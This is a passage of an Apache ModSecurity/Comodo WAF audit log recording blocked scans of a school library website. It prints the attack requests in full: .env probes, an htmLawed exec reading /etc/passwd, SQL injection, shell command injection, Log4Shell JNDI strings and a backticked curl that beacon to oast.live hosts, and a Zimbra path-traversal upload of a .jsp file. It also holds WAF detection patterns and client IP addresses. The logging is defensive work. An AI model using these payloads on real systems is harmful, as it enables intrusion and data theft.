[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748332532798565 938 (- - -) Stopwatch2: 1748332532798565 938; combined=357, p1=312, p2=0, p3=0, p4=0, p5=45, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6d695b40-Z-- --e83f4e1b-A-- [27/May/2025:15:13:25 +0700] aDV0Jd6cNBpj1JOkpQlb5AAAAEY 103.236.140.4 45888 103.236.140.4 8181 --e83f4e1b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 161.35.29.108 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 161.35.29.108 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --e83f4e1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e83f4e1b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748333605541274 785 (- - -) Stopwatch2: 1748333605541274 785; combined=308, p1=268, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e83f4e1b-Z-- --0c7fb66d-A-- [27/May/2025:15:36:21 +0700] aDV5hd6cNBpj1JOkpQlcYgAAAFU 103.236.140.4 46436 103.236.140.4 8181 --0c7fb66d-B-- POST /vendor/htmlawed/htmlawed/htmLawedTest.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 39 User-Agent: Mozilla/5.0 (SS; Linux i686; rv:127.0) Gecko/20100101 Firefox/127.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: sid=foo X-Varnish: 163550297 --0c7fb66d-C-- sid=foo&hhook=exec&text=cat+/etc/passwd --0c7fb66d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0c7fb66d-E-- --0c7fb66d-H-- Message: Access denied with code 403 (phase 2). Matched phrase "etc/passwd" at ARGS:text. [file "/usr/local/apache/modsecurity-cwaf/rules/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: etc/passwd found within ARGS:text: cat /etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748334981389957 3434 (- - -) Stopwatch2: 1748334981389957 3434; combined=1746, p1=506, p2=1209, p3=0, p4=0, p5=30, sr=74, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0c7fb66d-Z-- --d45c284c-A-- [27/May/2025:15:36:21 +0700] aDV5hWTuEZUBy5rh0saJlQAAAAc 103.236.140.4 46448 103.236.140.4 8181 --d45c284c-B-- GET /?rest_route=/wc/v3/wishlist/remove_product/1&item_id=0%20union%20select%20sleep(7)%20--%20g HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Debian; Linux i686; rv:121.0) Gecko/20100101 Firefox/121.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168513327 --d45c284c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d45c284c-E-- --d45c284c-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\x22'`](?:;? ?\\b(?:having|select|union)\\b ?[^\\s]| ?! ?[\\x22'`\\w])|\\b(?:c(?:onnection_id|urrent_user)|database)\\b ?\\(|\\bunion\\b[\\w(\\s]*?select\\b|\\buser ?\\(|\\bschema ?\\(|\\bselect.{0,399}?\\w?\\buser ?\\(|\\binto[\\s+]+(?:dump|o ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/22_SQL_SQLi.conf"] [line "27"] [id "211650"] [rev "12"] [msg "COMODO WAF: Detects MSSQL code execution and information gathering attempts||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 0 union select sleep(7) found within MATCHED_VAR: 0 union select sleep(7) "] [severity "CRITICAL"] [tag "CWAF"] [tag "SQLi"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748334981410268 2503 (- - -) Stopwatch2: 1748334981410268 2503; combined=1424, p1=330, p2=1066, p3=0, p4=0, p5=28, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d45c284c-Z-- --af3cf007-A-- [27/May/2025:15:36:21 +0700] aDV5hWTuEZUBy5rh0saJlgAAABc 103.236.140.4 46448 103.236.140.4 8181 --af3cf007-B-- POST /conf_mail.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 75 User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 163550303 --af3cf007-C-- mail_address=%3Bcat${IFS}/etc/passwd%3B&button=%83%81%81%5B%83%8B%91%97%90M --af3cf007-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af3cf007-E-- --af3cf007-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /conf_mail.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/perpus22.sock|fcgi://localhost Stopwatch: 1748334981427531 1835 (- - -) Stopwatch2: 1748334981427531 1835; combined=547, p1=398, p2=120, p3=0, p4=0, p5=29, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af3cf007-Z-- --80e4ac4a-A-- [27/May/2025:15:36:22 +0700] aDV5hluSH_Spa4YU2Zm1iAAAAMw 103.236.140.4 46454 103.236.140.4 8181 --80e4ac4a-B-- GET /?x=${jndi:ldap://127.0.0.1 HTTP/1.1 Referer: ${jndi:ldap://127.0.0.1#.${hostName}.referer.d0qa44pgpeoi1bmoheag1y5ef8chjpo69.oast.live} Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: ${jndi:ldap://127.0.0.1#.${hostName}.useragent.d0qa44pgpeoi1bmoheagxfyourkw6jify.oast.live} Accept: ${jndi:ldap://127.0.0.1#.${hostName}.accept.d0qa44pgpeoi1bmoheagykpgxnbeep53n.oast.live} Accept-Language: ${jndi:ldap://127.0.0.1#.${hostName}.acceptlanguage.d0qa44pgpeoi1bmoheagbtp53c1uffo8g.oast.live} Access-Control-Request-Headers: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestheaders.d0qa44pgpeoi1bmoheagnqp9ync6qecnf.oast.live} Access-Control-Request-Method: ${jndi:ldap://127.0.0.1#.${hostName}.accesscontrolrequestmethod.d0qa44pgpeoi1bmoheag3qn9gnkpk84s3.oast.live} Authentication: Bearer ${jndi:ldap://127.0.0.1#.${hostName}.authenticationbearer.d0qa44pgpeoi1bmoheag3jxy6mkx658sp.oast.live} Location: ${jndi:ldap://127.0.0.1#.${hostName}.location.d0qa44pgpeoi1bmoheagbf5tgqkmbbgrc.oast.live} Origin: ${jndi:ldap://127.0.0.1#.${hostName}.origin.d0qa44pgpeoi1bmoheagi3wa6heamks4n.oast.live} Upgrade-Insecure-Requests: ${jndi:ldap://127.0.0.1#.${hostName}.upgradeinsecurerequests.d0qa44pgpeoi1bmoheag5onwrmf61pdo3.oast.live} X-Api-Version: ${jndi:ldap://127.0.0.1#.${hostName}.xapiversion.d0qa44pgpeoi1bmoheagwgsfwyu695154.oast.live} X-CSRF-Token: ${jndi:ldap://127.0.0.1#.${hostName}.xcsrftoken.d0qa44pgpeoi1bmoheag3t8z5c915co84.oast.live} X-Druid-Comment: ${jndi:ldap://127.0.0.1#.${hostName}.xdruidcomment.d0qa44pgpeoi1bmoheaga71ufpbqs44ru.oast.live} X-Origin: 
${jndi:ldap://127.0.0.1#.${hostName}.xorigin.d0qa44pgpeoi1bmoheagcscnx7o8tjiz8.oast.live} Cookie: ${jndi:ldap://127.0.0.1#.${hostName}.cookiename.d0qa44pgpeoi1bmoheag9zceqy4warq1r.oast.live}=${jndi:ldap://${hostName}.cookievalue.d0qa44pgpeoi1bmoheagbmgzufdqqtxbh.oast.live} X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168513330 --80e4ac4a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --80e4ac4a-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\$\\{jndi:(ldaps?|rmi|dns|iiop|nis|nds|corba|\\$\\{(?:lower|upper)):" at ARGS:x. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "7626"] [id "248270"] [rev "1"] [msg "COMODO WAF: Remote code execution in Apache log4j||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748334982411282 5554 (- - -) Stopwatch2: 1748334982411282 5554; combined=4198, p1=379, p2=3784, p3=0, p4=0, p5=35, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80e4ac4a-Z-- --a727d544-A-- [27/May/2025:15:39:28 +0700] aDV6QN6cNBpj1JOkpQlcdQAAAEA 103.236.140.4 46538 103.236.140.4 8181 --a727d544-B-- POST /OA_HTML/BneViewerXMLService?bne:uueupload=TRUE HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 585 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZsMro0UsAQYLDZGv X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 163053630 --a727d544-C-- ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="bne:uueupload" TRUE ------WebKitFormBoundaryZsMro0UsAQYLDZGv Content-Disposition: form-data; name="uploadfilename";filename="testzuue.zip" begin 664 test.zip M4$L#!!0``````&UP-%:3!MD>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --f29ba104-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f29ba104-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748339690392473 5485 (- - -) Stopwatch2: 1748339690392473 5485; combined=3746, p1=476, p2=3239, p3=0, p4=0, p5=31, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f29ba104-Z-- --98fb5039-A-- [27/May/2025:16:54:50 +0700] aDWL6luSH_Spa4YU2Zm3EAAAAMM 103.236.140.4 51042 103.236.140.4 8181 --98fb5039-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Safari/120.0 Safari/537.36 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169051491 --98fb5039-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ 
Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --98fb5039-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --98fb5039-E-- --98fb5039-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748339690410558 4436 (- - -) Stopwatch2: 1748339690410558 4436; combined=3285, p1=362, p2=2896, p3=0, p4=0, p5=27, sr=69, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --98fb5039-Z-- --93fdce51-A-- [27/May/2025:17:55:51 +0700] aDWaN2TuEZUBy5rh0saNOQAAABg 103.236.140.4 52400 103.236.140.4 8181 --93fdce51-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 178.128.204.142 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 178.128.204.142 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 6.0; LG-D850 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.97 Mobile Safari/537.36 Accept-Charset: utf-8 --93fdce51-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --93fdce51-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748343351067077 12579 (- - -) Stopwatch2: 1748343351067077 12579; combined=23883, p1=293, p2=0, p3=0, p4=0, p5=11814, sr=75, sw=1, l=0, gc=11775 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --93fdce51-Z-- --89d0e258-A-- [27/May/2025:18:07:36 +0700] aDWc-FuSH_Spa4YU2Zm3OAAAAMg 103.236.140.4 52472 103.236.140.4 8181 --89d0e258-B-- POST /saas./resttosaasservlet HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 172 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: application/x-thrift X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168513587 --89d0e258-C-- [1,"createSupportBundle",1,0,{"1":{"str":"1111"},"2":{"str":"`curl d0qa44pgpeoi1bmoheage4f7z3hnyr1oe.oast.live`"},"3":{"str":"value3"},"4":{"lst":["str",2,"AAAA","BBBB"]}}] --89d0e258-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --89d0e258-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/x-thrift"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748344056300919 3480 (- - -) Stopwatch2: 1748344056300919 3480; combined=2076, p1=489, p2=1517, p3=21, p4=23, p5=25, sr=93, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89d0e258-Z-- --2278b851-A-- [27/May/2025:18:42:29 +0700] aDWlJVuSH_Spa4YU2Zm3WwAAAMI 103.236.140.4 53052 103.236.140.4 8181 --2278b851-B-- POST /service/extension/backup/mboximport?account-name=admin&account-status=1&ow=cmd HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.2 Safari/605.1.15 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160763161 --2278b851-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --2278b851-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2278b851-E-- --2278b851-H-- Message: Access denied with code 403 (phase 2). Found 4 byte(s) in ARGS:PK\x03\x04\x14\x00\b\x00\b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 outside range: 1-255. 
[file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:PK\x5cx03\x5cx04\x5cx14\x5cx00\x5cb\x5cx00\x5cb\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00\x5cx00=\x00\x00\x00../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jsp\x1c\xc8\xbd\x0a\xc20\x10\x00\xe0\xbdOQ\x02\x85\x04!(\xb8U\x5c\xfc[\xc4\x16;\xb4t;\xdbCS\xcf$\xc6K\xf4\xf1E\xd7oUd.\xb2\xf6\xc1X"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748346149576921 5508 (- - -) Stopwatch2: 1748346149576921 5508; combined=3561, p1=498, p2=3033, p3=0, p4=0, p5=29, sr=91, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2278b851-Z-- --48f4f74d-A-- [27/May/2025:18:42:29 +0700] aDWlJd6cNBpj1JOkpQlfaAAAAFc 103.236.140.4 53054 103.236.140.4 8181 --48f4f74d-B-- POST /service/extension/backup/mboximport?account-name=admin&ow=2&no-switch=1&append=1 HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 716 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.1 Safari/605.1.15 content-type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 160763164 --48f4f74d-C-- PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspȽ Â0à½OQ…!(¸U\ü[Ä;´t;ÛCSÏ$ÆKôñE×oUd.²öÁX&+Åi¸´ã¼;Àm³Ü>D>ËE•zØÜ?ÇÔ»®ê£PefñO@§÷†P‚÷d`㬾"Ÿ¨¾É€Ïˆ/þYƒ!òŸ•RzDBF©Ê¬XÿÿPK?Ý]…‰PK?Ý]…‰=../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPK?Ý]…‰=ð../../../../mailboxd/webapps/zimbraAdmin/0MVzAe6pgwe5go1D.jspPKÖà --48f4f74d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48f4f74d-H-- Message: Access denied with code 403 (phase 2). Found 4 